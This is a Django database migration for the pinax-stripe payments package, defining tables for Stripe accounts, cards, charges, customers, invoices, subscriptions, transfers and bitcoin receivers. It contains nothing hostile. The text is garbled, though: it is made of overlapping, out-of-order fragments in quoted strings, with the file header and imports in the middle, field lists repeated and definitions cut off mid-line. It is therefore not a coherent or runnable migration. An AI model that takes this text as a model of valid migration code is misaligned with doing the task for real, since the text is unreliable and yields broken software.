migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True,", "null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True,", "models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial =", "('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ],", "models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)), ('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')),", "('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()),", "('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()),", "models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, 
null=True)), ('total',", "max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)),", "django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "-*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06 19:00 from", "False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()),", "models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily',", "('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)),", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), 
('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)),", "jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at',", "to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start',", "null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', 
models.CharField(max_length=3)),", "models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on',", "('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True,", "models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency',", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()),", "models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), 
('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2,", "('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()),", "options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()),", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem',", "max_length=10)), ('closed', models.BooleanField(default=False)), 
('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()),", "models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True,", "('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source', models.CharField(blank=True, max_length=100)),", "to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Invoice',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), 
('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received',", "models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account',", "('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)),", "name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off',", "}, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None,", "field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]),", "models.CharField(max_length=191, unique=True)), ('created_at', 
models.DateTimeField(default=django.utils.timezone.now)), ('amount_due', models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor',", "models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={", "models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)),", "related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)),", "models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, },", "('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False,", "'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', 
models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed',", "models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')),", "decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True,", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract':", "('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),", "('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, 
related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, },", "('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone',", "models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True,", "null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin,", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ),", "import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations", "null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', 
models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True,", "('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel(", "('country', models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether(", "('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', 
models.TextField(blank=True, null=True)),", "max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()),", "models.DecimalField(decimal_places=2, max_digits=9)), ('attempted', models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed',", "('Daily', 'daily'), ('Weekly', 'weekly'), ('Monthly', 'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True,", "max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description',", "name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),", "('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), ('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ),", "migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True,", "max_length=32, primary_key=True, 
serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message',", "migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start',", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone',", "('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity',", "null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', 
to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None,", "('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={", "), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)),", "models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card',", "('fingerprint', models.TextField()), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False,", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "'abstract': False, }, ), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True,", "('last4', models.CharField(max_length=4)), ('metadata', 
jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')),", "models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled',", "models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description',", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, },", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()),", "migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2,", "null=True)), ], options={ 'abstract': False, 
}, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id',", "models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee',", "null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)),", "('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date',", "model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount',", "models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True,", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), 
migrations.AddField(", "django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies", "to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32,", "import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies =", "models.TextField()), ('currency', models.TextField()), ('default_for_currency', models.BooleanField(default=False)), ('fingerprint', models.TextField()), ('last4', models.CharField(max_length=4)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number',", "model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True,", "max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)),", "('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check',", "max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, },", "migrations.CreateModel( 
name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback',", "('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id',", "models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)),", "('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)), ('trial_start', models.DateTimeField(blank=True, null=True)), ('customer',", "models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group',", "max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), 
